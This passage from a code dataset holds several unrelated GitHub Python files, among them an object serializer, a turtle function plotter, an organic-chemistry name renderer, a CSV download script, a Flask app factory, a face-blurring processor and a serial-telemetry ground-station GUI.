prop.required_property:\n if not prop_name in kwargs.keys():\n if not hasattr(self, \"init_%s\" % prop_name) and not hasattr(self.__class__, \"define_%s\" % prop_name):\n raise TypeError(\"Missing required value: '%s'\" % prop_name)\n \n self.__explicity_values = []\n for key,value in kwargs.items():\n if key in self._core_properties:\n #TODO: locked\n # if isinstance(self.__class__.__getattribute__(self.__class__,key), LockedProperty):\n # print(8888)\n self.__explicity_values.append(key)\n setattr(self, key, value)\n else:\n raise UnexpectedArgumentError(\"Got an unexpected key: '%s'\" % key)\n \n self._lazy_pointers = {}\n self._define_properties()\n\n\n def _define_properties(self):\n \"\"\"\n This function handle automatic definitions for properties\n\n class A(Bento):\n a = IntegerProperty()\n def init_a(self):\n a = rand.random()\n \"\"\"\n for prop in self._core_properties.keys():\n\n if prop in self.__explicity_values:\n continue\n\n init_name = \"init_%s\" % prop\n lazy = \"define_%s\" % prop\n if hasattr(self.__class__, lazy):\n f = getattr(self, lazy)\n self._lazy_pointers[prop] = f\n continue\n\n if hasattr(self, init_name):\n f = getattr(self, init_name)\n value = f()\n setattr(self, prop, value)\n \n\n def _set_consecutive_arguments(self, args):\n \n if len(args) > len(self._consecutive_arguments):\n raise ArgumentsArithmError()\n\n for arg,attr in zip(args, self._consecutive_arguments):\n setattr(self, attr, arg)\n\n def dump(self):\n \"\"\"\n Convert it from object to structure\n \"\"\"\n\n d = {}\n\n for arg in self._consecutive_arguments:\n if hasattr(self, arg):\n obj = getattr(self, arg)\n\n if isinstance(obj, Bento):\n d[arg] = obj.dump()\n elif isinstance(obj,(list, tuple)):\n if obj:\n if isinstance(obj[0], Bento):\n d[arg] = [v.dump() for v in obj]\n else:\n d[arg] = [v for v in obj]\n else:\n d[arg] = []\n else:\n 
d[arg] = getattr(self, arg)\n\n return d\n\n @classmethod\n def load(cls, raw):\n \"\"\" \n Recreate a Bento object based on a structure\n \"\"\"\n bento_object = cls()\n\n for key,value in raw.items():\n\n if key in bento_object._core_properties:\n meta_obj = cls.__getattribute__(cls,key)\n \n if isinstance(meta_obj, ObjectProperty):\n obj_class = meta_obj._object_definition\n obj = obj_class.load(value)\n setattr(bento_object, key, obj)\n\n elif isinstance(meta_obj, ListProperty):\n obj_class = meta_obj._keys['list_content_type']\n if issubclass(obj_class, Bento):\n obj = [obj_class.load(v) for v in value]\n else:\n obj = [obj_class(v) for v in value]\n setattr(bento_object, key, obj)\n\n else:\n setattr(bento_object, key, value)\n \n else:\n raise UnexpectedArgumentError(\"%s got an unexpected argument named '%s'\" % (cls, key))\n\n return bento_object\n\n def _touch(self):\n \"\"\"\n Actually does nothing. Used for performance measurement\n \"\"\"\n\n for arg in self._consecutive_arguments:\n if hasattr(self, arg):\n obj = getattr(self, arg)\n\n if isinstance(obj, Bento):\n obj._touch()\n elif isinstance(obj,(list, tuple)):\n if obj:\n if isinstance(obj[0], Bento):\n for v in obj:\n v._touch()\n else:\n getattr(self, arg)\n\n\n\n\ndef cache(function):\n \"\"\"\n Cache decorator\n \"\"\"\n\n def decorator(*args, **kwargs):\n self = args[0]\n prop_name = function.__name__[7:] # removing 'define_'\n self._strongly_cached_properties.add(prop_name)\n return function(*args, **kwargs)\n\n if function.__name__.startswith('define_'):\n return decorator\n else:\n return function\n","repo_name":"alvesjnr/PyBento","sub_path":"bento/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":6765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11997809764","text":"import turtle\nimport graph.module as module\n\n\nclass Graph:\n ''' Represent a Cartesian orthogonal system Oxy\n\n Attributes: width - lenght of Ox\n height - lenght of Oy\n unit - pixels correspond with 1 unit in Ox\n pen - a object of turtle class\n '''\n def __init__(self, width, height):\n self.width = width\n self.height = height\n self.unit = 250 / max(self.width, self.height)\n self.pen = turtle.Turtle()\n self.pen.hideturtle() # hide turtle\n self.pen.speed(0) # set max speed\n\n module.initOxy(self.pen, self.width, self.height, self.unit)\n # draw Cartesian orthogonal system Oxy\n\n color = ['red', 'blue', 'green', 'brown', 'orange'] # color of pen\n indexColor = 0\n\n def draw(self, func, sepLine=True):\n if sepLine: # 2 line is not same color\n if Graph.indexColor == len(Graph.color):\n Graph.indexColor = 0\n self.pen.pencolor(Graph.color[Graph.indexColor])\n Graph.indexColor += 1\n\n lines = module.makeLine(func, self.width, self.height, self.unit)\n for line in lines:\n first = True\n for (x, y) in line:\n if first: # this point is the first of a line\n self.pen.pu()\n self.pen.goto((x, y))\n self.pen.pd()\n first = False\n else:\n self.pen.goto((x, y))\n\n\ndef main():\n width = turtle.numinput('INPUT WIDTH', 'Enter width: ', 10, 0, 50)\n if width is None:\n return\n\n height = turtle.numinput('INPUT HEIGHT', 'Enter height: ', 10, 0, 50)\n if height is None:\n return\n\n graph = Graph(width, height)\n\n while True:\n func = turtle.textinput(\"IMPORT FUNCTION\", \"Enter function: \")\n if func is None:\n break\n\n graph.draw(func)\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"Hi-Im-darkness/graph","sub_path":"graph/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"71302717547","text":"#Organic Chemistry\nimport turtle\nimport re\n\nprefixes = ['meth','eth','prop','but','pent','hex','hept','oct','non','dec','undec','dodec'] \ngreekL = ['di','tri','tetra'] + [elt + 'a' for elt in prefixes[4:]]\nsuffixes = {'e':[],'ol':['OH'],'al':['O'],'one':['O'],'oique':['O','OH']}\n\nGRID = 6\nDEG = 360/GRID\nSIZE = 50\n\ndef valid(molecule):\n    #BEHOLD MY MONSTROSITY\n    Npre = '(' + '|'.join(prefixes) + ')'\n    Gpre = '(' + '|'.join(greekL) + ')'\n    suf1 = '(' + '|'.join(list(suffixes)[::2]) + ')' #suffixes that don't need a positional argument\n    suf2 = '(' + '|'.join(list(suffixes)[1::2]) + ')' #suffixes that need a positional argument\n    \n    nums = '(([0-9],?)+)-' #ex: 2,12,3,6\n    rams = nums+Gpre+'?'+Npre+'yl' #ex: 2,2-dimethyl\n    \n    groups = nums+Gpre+'?'+suf2 #ex: -2,3-diol\n    princ = Npre+'an('+suf1+'|(-'+groups+'))' #ex: propane, methanoique, butan-1,2-diol\n    \n    exp = r'(acide )?('+rams+'(-?))*'+princ #3-ethyl-2,2-dimethylhexan-4,5-diol]\n    \n    ind = re.fullmatch(exp,molecule)\n\n    if ind == None:\n        return False\n    return True\n\ndef removeAcide(mol):\n    if mol[:6] == 'acide ':\n        if mol[-5:] == list(suffixes)[4]: # 'oique'; indexing the dict with an int raised KeyError\n            mol = mol[6:]\n        else:\n            print('ERROR not acide')\n    \n    return mol\n\ndef getElt(liste, mol):\n    for elt in liste:\n        if mol.find(elt) == 0:\n            return elt\n    return None\n\ndef getList(link, string):\n    liste = []\n    temp = ''\n    for x in string:\n        if x != link:\n            temp += x\n        else:\n            liste.append(temp)\n            temp = ''\n    if temp != '':\n        liste.append(temp)\n    return liste\n\ndef getNumbs(string):\n    ind = string.find('-')\n    numb = getList(',', string[:ind])\n    string = string[ind+1:]\n    \n    numb = [int(elt) for elt in numb]\n    \n    return numb, string\n\ndef getRepeat(string):\n    greek = getElt(greekL, string)\n    \n    repeat = 1\n    if greek:\n        repeat = greekL.index(greek)+2\n        string = string[len(greek):]\n    \n    return repeat, string\n\ndef sign(degrees):\n    if degrees > 180:\n        return -1\n    else:\n        return 1\n\ndef drawElt(elt, t):\n    if type(elt) == str:\n        t.write(elt, align=\"center\", font=('Arial', 12, 'bold'))\n    elif type(elt) == int:\n        tempPos = t.pos()\n        tempHead = t.heading()\n        d = 1\n        t.down()\n        for i in range(elt-1):\n            t.right(d*DEG)\n            d = -d\n            t.forward(SIZE)\n        t.up()\n        t.setpos(tempPos)\n        t.seth(tempHead)\n        t.down()\n\ndef drawMolecule(liste):\n    wn = turtle.Screen()\n    wn.bgcolor(\"#eeeee4\")\n    wn.title(\"PC Organic Chemistry\")\n    #<-code from https://stackoverflow.com/questions/44775445/python-turtle-window-on-top\n    rootwindow = wn.getcanvas().winfo_toplevel()\n    rootwindow.call('wm', 'attributes', '.', '-topmost', '1')\n    rootwindow.call('wm', 'attributes', '.', '-topmost', '0')\n    #->\n\n    turt = turtle.Turtle()\n    turt.pensize(2)\n    turt.up()\n\n    offset = -(len(liste)-1)*43\n    turt.setx(offset/2)\n    \n    #DRAW FIRST LINK\n    turt.down()\n    if len(liste[0]) >= 1:\n        drawElt(liste[0][0], turt)\n    turt.seth(DEG/2)\n    turt.forward(SIZE)\n    \n    if len(liste[0]) >= 2:\n        turt.right(DEG*2)\n        turt.backward(SIZE)\n        drawElt(liste[0][1], turt)\n        turt.forward(SIZE)\n        turt.left(DEG)\n    turt.up()\n    turt.seth(DEG/2)\n    \n    #DRAW CHAIN\n    for C in liste[1:-1]:\n        turt.down()\n        if turt.heading() < 180:\n            turt.right(DEG)\n        else:\n            turt.left(DEG)\n        \n        if len(C) >= 0:\n            turt.forward(SIZE)\n        if len(C) == 1:\n            turt.left(sign(turt.heading()) * 60)\n            turt.forward(SIZE)\n            drawElt(C[0], 
turt)\n turt.backward(SIZE)\n turt.right(sign(turt.heading()) * 60)\n if len(C) == 2:\n turt.left(sign(turt.heading()) * 90)\n turt.forward(SIZE)\n drawElt(C[0], turt)\n turt.backward(SIZE)\n turt.right(sign(turt.heading()) * 180)\n turt.forward(SIZE)\n drawElt(C[1], turt)\n turt.backward(SIZE)\n turt.right(sign(turt.heading()) * 150)\n turt.up() \n \n #DRAW LAST\n if len(liste) > 1:\n turt.down()\n if turt.heading() < 180:\n turt.right(DEG)\n else:\n turt.left(DEG)\n \n if len(liste[-1]) == 0:\n turt.forward(SIZE)\n \n if len(liste[-1]) >= 1:\n drawElt(liste[-1][0], turt)\n turt.seth(DEG/2)\n turt.forward(SIZE)\n \n if len(liste[-1]) >= 2:\n turt.backward(SIZE)\n turt.right(DEG)\n turt.forward(SIZE)\n drawElt(liste[-1][-1], turt)\n turt.up()\n turt.hideturtle()\n turtle.done()\n\ndef parseMolecule(mol):\n tempM = mol\n \n #RAMMIFICATION\n rammify = []\n\n for i in range(tempM.count('yl')):\n numb, tempM = getNumbs(tempM)\n repeat, tempM= getRepeat(tempM)\n \n if len(numb) != repeat:\n print(\"ERROR: {} doesn't match {}\".format(len(numb),repeat))\n \n pre = getElt(prefixes, tempM)\n tempM = tempM[len(pre):]\n \n val = prefixes.index(pre)+1\n for i in range(repeat):\n rammify.append((numb[i],val))\n tempM = tempM[2:]\n \n if tempM[0] == '-':\n tempM = tempM[1:]\n\n print(rammify)\n\n #CHAINE PRINCIPAL\n\n print(tempM)\n\n pre = getElt(prefixes, tempM)\n tempM = tempM[len(pre) + 2:]\n\n numb = [1] #when the ending is suf1\n if tempM[0] == '-':\n numb, tempM = getNumbs(tempM[1:])\n repeat, tempM= getRepeat(tempM)\n if len(numb) != repeat:\n print(\"ERROR: {} doesn't match {}\".format(len(numb),repeat))\n\n suf = getElt(suffixes, tempM)\n\n val = prefixes.index(pre)+1\n\n tableau = [[] for i in range(val)]\n for elt in rammify:\n tableau[elt[0]-1].append(elt[1])\n\n for i in numb:\n for atom in suffixes.get(suf):\n tableau[i-1].append(atom)\n \n return tableau\n\n\n#------------------- PROGRAMME -------------------\n\nwhile True:\n molecule = input(\"Insert molecule name: \").lower()\n\n if valid(molecule):\n break\n else:\n print(\"Please provide valid molecule.\\n\")\n\ntableau = parseMolecule(molecule)\n\nprint(tableau)\n\ndrawMolecule(tableau)\n","repo_name":"cmoll24/IUPAC-Chemistry-Renderer","sub_path":"OrganicChemistry.py","file_name":"OrganicChemistry.py","file_ext":"py","file_size_in_byte":6409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15029480207","text":"\"\"\"\nThis script will extract files from pages provided\n\"\"\"\n\n# Standar library imports\nimport os\nimport pandas as pd\nimport requests\nimport datetime\nfrom requests.exceptions import HTTPError\nfrom bs4 import BeautifulSoup\nfrom decouple import config\n\n# Local applications\nfrom loggings import set_up_loggin\n\n# Set up logger\nlogger = set_up_loggin(config(\"FILE_LOGGER_NAME\"))\n\n\ndef find_url_csv(url: str):\n \"\"\"\n This function receive the url\n where csv files will be downloaded.\n \n @param: url of the page where is located the csv file\n \"\"\"\n try: \n response = requests.get(url)\n if response.ok:\n logger.info(\"Connection status to the current page: Ok\")\n else:\n logger.error(\"Connection status to the current page: Fail\") \n except HTTPError as http_error: \n logger.critical(f\"{http_error}\")\n except Exception as ex:\n logger.error(f\"{ex}\") \n \n soup = BeautifulSoup(response.text, features=\"html.parser\")\n tag = soup.find(\"a\", class_=\"btn btn-green btn-block\")\n \n \n return tag.attrs[\"href\"] \n \n \ndef 
download_csv(category, url):\n \"\"\"\n This function takes the csv's url\n and prepare the file to be downloaded\n \n @param: category of the file will be downloaded\n \n @param: url of the csv file\n \"\"\" \n # Dates \n year = datetime.datetime.now().year\n month = datetime.datetime.now()\n day = datetime.datetime.now().day\n \n # Building path\n path = f\"{category}\" \n if not os.path.exists(path):\n os.mkdir(path)\n \n path = os.path.join(path, f\"{year}-{month.strftime('%B')}\")\n if not os.path.exists(path):\n os.mkdir(path) \n \n try: \n response = requests.get(url)\n if response.ok:\n with open(\n os.path.join(path, f\"{category}-{day}-{month.month}-{year}\"), \n \"wb\"\n ) as f:\n f.write(response.content) \n \n logger.info(f\"{category} information download status: Success\") \n else:\n logger.error(f\"{category} information download status: Fail\") \n except HTTPError as http_error: \n logger.critical(f\"{http_error}\")\n except Exception as ex:\n logger.error(f\"{ex}\") \n \n # Setting categories\n \n \ndef main_download_source_files(): \n \"\"\"\n This function execute the functions\n created above.\n \"\"\"\n logger.info(\"The execution of download_source_files.py started\")\n\n categories = [\"MUSEOS\", \"BIBLIOTECAS\", \"CINES\"] \n for i in categories:\n url = find_url_csv(config(i))\n download_csv(i.lower(), url) \n \n logger.info(\"The execution of download_source_files.py finished\")\n\nif __name__ == '__main__':\n main_download_source_files()\n ","repo_name":"gioleon/challenge-alkemy","sub_path":"download_source_files.py","file_name":"download_source_files.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22516793928","text":"import os\nimport yaml\nfrom flask import Flask as BaseFlask, Config as BaseConfig\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\n\ndb = SQLAlchemy()\nma = Marshmallow()\n\n\nclass Config(BaseConfig):\n\n def from_yaml(self, config_file):\n env = os.environ.get('FLASK_ENV', 'development')\n self['ENVIRONMENT'] = env.lower()\n\n with open(config_file) as f:\n c = yaml.load(f, yaml.Loader)\n\n c = c.get(env, c)\n for key in c.keys():\n if key.isupper():\n self[key] = c[key]\n\n\nclass Flask(BaseFlask):\n\n def make_config(self, instance_relative=False):\n root_path = self.root_path\n if instance_relative:\n root_path = self.instance_path\n return Config(root_path, self.default_config)\n\n\ndef register_blueprints(app: Flask):\n from .handler import user\n from .handler import node\n app.register_blueprint(user.user_bp)\n app.register_blueprint(node.node_bp)\n\n\ndef create_app():\n app = Flask(__name__, instance_relative_config=True)\n app.config.from_yaml(os.path.join(app.root_path, 'config.yml'))\n register_blueprints(app)\n db.init_app(app)\n ma.init_app(app)\n with app.app_context():\n db.create_all()\n a = db.session.execute(\n \"SELECT COUNT(1) indexExists FROM INFORMATION_SCHEMA.STATISTICS \"\n \"WHERE table_schema=DATABASE() AND table_name='node' AND index_name='idx_node_ftxt';\")\n if a.columns('indexExists').first()[0] == 0:\n db.session.execute(\"CREATE FULLTEXT INDEX idx_node_ftxt on node (detail)\")\n return app\n","repo_name":"flametest/flask-server-example","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13926023220","text":"#가로축순회 하고 
회문 못찾으면 세로축순회\n#가로축 처음인덱스와 끝인덱스 비교비교비교\n\nT = int(input())\nfor tc in range(1, T+1):\n n, m = map(int,input().split())\n arr = [input() for _ in range(n)]\n result = 0\n newnewarr=[]\n # 가로축에서 회문 찾기\n for i in range(n): # 0 1 2 3 4 5 6 7 8 9\n for j in range(n-m+1): # 0 1 2 3 4\n if arr[i][j:j+m] == arr[i][j:j+m][::-1]:\n result = ''.join(arr[i][j:j+m])\n\n # 세로축에서 회문 찾기\n # 세로축은 슬라이싱 안되니까 행 열 자리 바꿔주자\n for i in range(n):\n newarr = []\n for j in range(n):\n newarr += arr[j][i]\n newnewarr.append(''.join(newarr))\n\n for i in range(n): # 0 1 2 3 4 5 6 7 8 9\n for j in range(n-m+1): # 0 1 2 3 4\n if newnewarr[i][j:j+m] == newnewarr[i][j:j+m][::-1]:\n result = ''.join(newnewarr[i][j:j+m])\n\n print(f'#{tc} {result}')\n\n\n\n","repo_name":"seongbiny/algorithm","sub_path":"SWEA/4861.py","file_name":"4861.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"522396199","text":"import torch\r\nfrom facenet_pytorch import MTCNN\r\nfrom src.Utils.ConfigProvider import ConfigProvider\r\nimport numpy as np\r\nimport cv2\r\nfrom src.post_processing.PostProcessor import PostProcessor\r\nfrom src.statefull_processing.BboxTracker import BboxTracker\r\n\r\n\r\nclass StatefulFrameProcessor(object):\r\n def __init__(self):\r\n self._config = ConfigProvider.config()\r\n self._device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\r\n print(f'Running on device: {self._device}')\r\n self._mtcnn = MTCNN(keep_all=True, device=self._device)\r\n self._bbox_tracker = BboxTracker()\r\n\r\n # self._last_frame_filtered_bboxes, self._last_frame_confidences = None, None\r\n\r\n def process_single_frame(self, frame, frame_index):\r\n detected_bboxes, confidences = self._mtcnn.detect(frame)\r\n detected_bboxes = [] if detected_bboxes is None else detected_bboxes\r\n confidences = [] if confidences is None else confidences\r\n\r\n confident_bboxes = np.array([bbox for bbox, confidence in zip(detected_bboxes, confidences) if\r\n self._config.detection.confidence_threshold < confidence])\r\n tracked_bboxes = self._bbox_tracker.update_tracked_bboxes(\r\n frame_index=frame_index,\r\n new_bboxes=confident_bboxes)\r\n\r\n frame = cv2.cvtColor(np.array(frame), cv2.COLOR_RGB2BGR)\r\n if 0 < len(tracked_bboxes.shape):\r\n frame = PostProcessor.draw_rectengles(frame, tracked_bboxes)\r\n frame = PostProcessor.blur_at_bboxes(frame, tracked_bboxes)\r\n return frame\r\n","repo_name":"noamzilo/face_pose_estimation","sub_path":"statefull_processing/StatefulFrameProcessor.py","file_name":"StatefulFrameProcessor.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8024989114","text":"import gc\n\nfrom pandas import Categorical\n\nfrom .evaluation.analysis import normalize_scores\n\n\ndef rank_by_func(scores):\n scores['rank'] = scores.groupby('func').score.rank(ascending=False, method='first')\n return scores\n\n\ndef add_helper_columns(scores):\n scores['is_indication'] = scores.group == 'indications'\n scores['is_indication'] = Categorical(scores.is_indication)\n scores['known_indication'] = scores['is_indication'].cat.rename_categories({\n True: 'known indications',\n False: 'non-indications'\n })\n return scores\n\n\ndef rename_and_order_func(scores, nice_function_names):\n scores.func = scores.func.cat.rename_categories(nice_function_names)\n scores.func = Categorical(scores.func, ordered=True, categories=[\n name\n 
for name in nice_function_names.values()\n if name in scores.func.unique()\n ])\n return scores\n\n\ndef categorize_values(scores):\n categorical_columns = ['pert_iname', 'group', 'pert_idose', 'func', 'cell_id']\n for categorical in categorical_columns:\n if categorical in scores.columns:\n scores[categorical] = Categorical(scores[categorical])\n gc.collect()\n return scores\n\n\ndef process_scores(scores, names_map):\n scores = categorize_values(scores)\n scores = normalize_scores(scores, rescale=True, by_cell=False)\n scores = rename_and_order_func(scores, names_map)\n scores = add_helper_columns(scores)\n scores = rank_by_func(scores)\n return scores\n","repo_name":"krassowski/drug-disease-profile-matching","sub_path":"signature_scoring/post_processing.py","file_name":"post_processing.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"22243376859","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom PIL import Image\nfrom PIL import ImageTk\nimport serial as sr\nimport numpy as np\nimport pandas as pd\nimport csv\nimport serial.tools.list_ports\n\n################################################### SERIAL DATA FUNCTIONS ########################################################\n# a = {\\\n# \"pkt\":15,\"drp\":101,\"alt\":65,\"temp\":84.59,\"lat\":49.854826,\n# \"lon\":72.958413,\"hdng\":20.54,\"spd\":10.96,\"aclx\":2.12,\"acly\":6.54,\n# \"aclz\":1.25,\"gyrox\":1.26,\"gyroy\":1.48,\"gyroz\":2.08,\"magx\":1.85,\n# \"magy\":8.95,\"magz\":4.85,\"habDrp\":68.95,\"cdaDrp\":23.39,\"watDrp\":102.65,\"rssi\":-40\n# } # Dummy Data\n# df = pd.DataFrame.from_dict(data = a, orient = 'index').T\ncond = False\ndf = pd.DataFrame()\n\n\ndef get_data():\n global cond, s, df # , a, df\n cda_check_drop = 0\n wh_check_drop = 0\n if (cond == True):\n serialString = s.readline().rstrip().decode(\"utf-8\") # Read data in serial buffer\n try:\n serialDict = eval(serialString) # Try to convert the raw string into a dictionary\n # serialDict = a\n except (NameError, SyntaxError, ValueError) as e: # catch any errors when trying to convert to dictionary\n pass\n else:\n print(serialDict)\n df = df.append(serialDict, ignore_index=True)\n\n altitude = format(serialDict['alt'],\".2f\")\n str_alt.set(altitude)\n\n speed = serialDict['spd']\n str_spd = tk.StringVar()\n str_spd.set(speed)\n speed_num = tk.Label(alt_frame, textvariable=str_spd, font=(\"Fixedsys\", 48), bd=5, relief=\"sunken\")\n speed_num.grid(row=1, column=6, sticky=\"ns\")\n\n if float(serialDict['habHeight']) != 0 and wh_check_drop == 0:\n wh_alt = serialDict['habHeight']\n wh_cda_alt = tk.StringVar()\n wh_cda_alt.set(wh_alt)\n\n wh_num = tk.Label(alt_frame, textvariable=wh_cda_alt, font=(\"Fixedsys\", 48), bd=5, relief=\"sunken\")\n wh_num.grid(row=1, column=4, sticky=\"ns\")\n wh_check_drop = 1\n\n if float(serialDict['cdaHeight']) != 0 and cda_check_drop == 0:\n cda_alt = serialDict['cdaHeight']\n str_cda_alt = tk.StringVar()\n str_cda_alt.set(cda_alt)\n\n cda_num = tk.Label(alt_frame, textvariable=str_cda_alt, font=(\"Fixedsys\", 48), bd=5, relief=\"sunken\")\n cda_num.grid(row=1, column=2, sticky=\"ns\")\n cda_check_drop = 1\n\n root.update_idletasks()\n root.after(100, get_data)\n\n\ndef data_stop():\n global cond, df, second_frame\n #cond = False\n for col_num, col_name in enumerate(df.columns):\n label = tk.Label(second_frame, width=6, height=1,\n text=col_name, relief=tk.RIDGE)\n label.grid(row=1, column=col_num)\n for i in 
range(len(df)):\n for j in range(len(df.iloc[0, :])):\n element = round(df.iloc[i, j], 2)\n label = tk.Label(second_frame, width=6, height=1,\n text=element, relief=tk.RIDGE)\n label.grid(row=i + 2, column=j)\n\n\n######################################################## COM PORT INPUT GUI ####################################################\n# function to return port # input\ndef format_port(port_number):\n com_port_str = 'COM' + str(port_number)\n return (com_port_str)\n\n\ndef get_port(entry):\n print('Port selected: ', entry)\n global comport_root\n comport_root.destroy()\n\n global cond\n cond = True\n # s.reset_input_buffer()\n\n global com_port\n com_port = format_port(entry)\n return com_port\n\n\n# comport GUI\ncomport_root = tk.Tk()\ncomport_root.title('Please enter your COM port')\ncomport_root.geometry('380x80')\n\n# entry box\nentry = tk.Entry(comport_root)\nentry.grid(row=1, column=0)\n\n# label of available COM ports\ncomList = serial.tools.list_ports.comports()\n# Get list of available COM ports\nconnected = ''\nfor element in comList:\n connected += (str(element.device) + ' ')\nlabel = tk.Label(comport_root, \\\n text='Available COM Ports:\\n' + connected,\n bg='white')\nlabel.grid(row=0, column=0)\n\n# enter button\nbutton = tk.Button(comport_root, \\\n text='Enter',\n bg='white',\n command=lambda: get_port(entry.get()))\nbutton.grid(row=1, column=1)\n\ncomport_root.mainloop()\n\n#################################################### BUILDING THE MAIN GUI ########################################################\n# creating the master window (root)\nroot = tk.Tk()\nroot.title('Ground Station GUI')\n# creating tab control\ntabcontrol = ttk.Notebook(root, \\\n height=1000,\n width=1800)\n\n# adding tabs\ndashboard = ttk.Frame(tabcontrol)\nall_data = ttk.Frame(tabcontrol)\ntabcontrol.add(dashboard, text='Dashboard')\ntabcontrol.add(all_data, text='All DAS Data')\ntabcontrol.pack(expand=1, fill='both')\n\n# ------------------------------------------------------- DASHBOARD TAB ---------------------------------------------------------------\n# CURRENT/PAYLOAD ALTITUDES AND SPEED\nalt_frame = tk.Frame(dashboard)\nalt_frame.place(relheigh=0.165, relwidth=0.70)\n\n# live altitude\n# altitude = 0.00\n# str_alt = tk.StringVar()\n# str_alt.set(altitude)\n\nalt_label = tk.Label(alt_frame, text=\"Current Altitude (ft):\", font=(\"Fixedsys\", 24), fg='black')\nalt_label.grid(sticky=\"nesw\")\n\nstr_alt = tk.StringVar()\nstr_alt.set(\"\")\nalt_num = tk.Label(alt_frame, textvariable=str_alt, font=(\"Fixedsys\", 48), bd=5, relief=\"sunken\")\nalt_num.grid(row=1, column=0, sticky=\"ns\")\n# alt_num = tk.Label(alt_frame, textvariable=str_alt, font=(\"Fixedsys\", 48), bd=5, relief=\"sunken\")\n# alt_num.grid(row = 1, sticky=\"ns\")\n\n# CDA altitude\n# cda_alt = 0.00\n# str_cda_alt = tk.StringVar()\n# str_cda_alt.set(cda_alt)\n\ncda_label = tk.Label(alt_frame, text=\"Colonist drop (ft):\", font=(\"Fixedsys\", 24), fg='black')\ncda_label.grid(row=0, column=2, sticky=\"nesw\", padx=15)\n\n# cda_num = tk.Label(alt_frame, textvariable=str_cda_alt, font=(\"Fixedsys\", 48), bd=5, relief=\"sunken\")\n# cda_num.grid(row=1, column = 2, sticky=\"ns\")\n\n# Water/habitat altitude\n# wh_alt = 0.00\n# str_wh_alt = tk.StringVar()\n# str_wh_alt.set(wh_alt)\n\nwh_label = tk.Label(alt_frame, text=\"Water/habitat drop (ft):\", font=(\"Fixedsys\", 24), fg='black')\nwh_label.grid(row=0, column=4, sticky=\"nesw\", padx=12)\n\n# wh_num = tk.Label(alt_frame, textvariable=str_cda_alt, font=(\"Fixedsys\", 48), bd=5, 
relief=\"sunken\")\n# wh_num.grid(row=1, column = 4, sticky=\"ns\")\n\n# Speed\n# speed = 0.00\n# str_speed = tk.StringVar()\n# str_speed.set(speed)\n\nspeed_label = tk.Label(alt_frame, text=\"Speed (mph):\", font=(\"Fixedsys\", 24), fg='black')\nspeed_label.grid(row=0, column=6, sticky=\"nesw\", padx=15)\n\n# speed_num = tk.Label(alt_frame, textvariable=str_cda_alt, font=(\"Fixedsys\", 48), bd=5, relief=\"sunken\")\n# speed_num.grid(row=1, column = 6, sticky=\"ns\")\n\n# # GPS\n# img = Image.open(\"formatted_airfield_test.jpeg\")\n# img = img.resize((400,480),Image.ANTIALIAS)\n# gps_img = ImageTk.PhotoImage(img)\n# gps_display = tk.Label(dashboard, image = gps_img)\n# gps_display.place(x=1000, y=250)\n\n# ----------------------------------------------------- DATA PLAYBACK TAB ---------------------------------------------------------------\nBOTH = 'both'\nLEFT = 'left'\nRIGHT = 'right'\nVERTICAL = 'vertical'\nY = 'y'\nstyle = ttk.Style()\nstyle.configure(\"Vertical.TScrollbar\", gripcount=0,\n background=\"Green\", darkcolor=\"DarkGreen\", lightcolor=\"LightGreen\",\n troughcolor=\"gray\", bordercolor=\"blue\", arrowcolor=\"white\")\n# making a main frame\nmain_frame = tk.Frame(all_data)\nmain_frame.pack(fill=BOTH, expand=1)\n# making a canvas\ndata_canvas = tk.Canvas(main_frame)\ndata_canvas.pack(side=LEFT, fill=BOTH, expand=1)\n# making a scrollbar\nscrollbar = ttk.Scrollbar(main_frame, orient=VERTICAL, command=data_canvas.yview, style=\"Vertical.TScrollbar\")\nscrollbar.pack(side=RIGHT, fill=Y)\n# configure the canvas\ndata_canvas.configure(yscrollcommand=scrollbar.set)\ndata_canvas.bind('', lambda e: data_canvas.configure(scrollregion=data_canvas.bbox('all')))\n# making a second frame for the data\nsecond_frame = tk.Frame(data_canvas)\n# adding that^ frame to a window to be placed in the canvas\ndata_canvas.create_window((0, 300), window=second_frame, anchor='nw')\n\n# adding a display data button\nshow_data_button = tk.Button(all_data, \\\n text='Click for data', command=lambda: data_stop())\nshow_data_button.place(anchor='nw')\n\ns = sr.Serial('COM4', 9600) # change COM Port name\ns.reset_input_buffer()\nroot.after(5, get_data)\nroot.mainloop()\n","repo_name":"FirkinTage/UDASAE_Controls","sub_path":"ControlsGUI/GUI-Draft-3.py","file_name":"GUI-Draft-3.py","file_ext":"py","file_size_in_byte":8694,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"34900674207","text":"import warnings\nfrom typing import List\n\nimport torch\nfrom torch.utils.data import random_split\nfrom torch_geometric.loader import DataLoader\nfrom torch_geometric.transforms import Compose\n\nfrom matdeeplearn.common.registry import registry\nfrom matdeeplearn.preprocessor.datasets import LargeStructureDataset, StructureDataset\n\n\n# train test split\ndef dataset_split(\n dataset,\n train_size: float = 0.8,\n valid_size: float = 0.05,\n test_size: float = 0.15,\n):\n \"\"\"\n Splits an input dataset into 3 subsets: train, validation, test.\n Requires train_size + valid_size + test_size = 1\n\n Parameters\n ----------\n dataset: 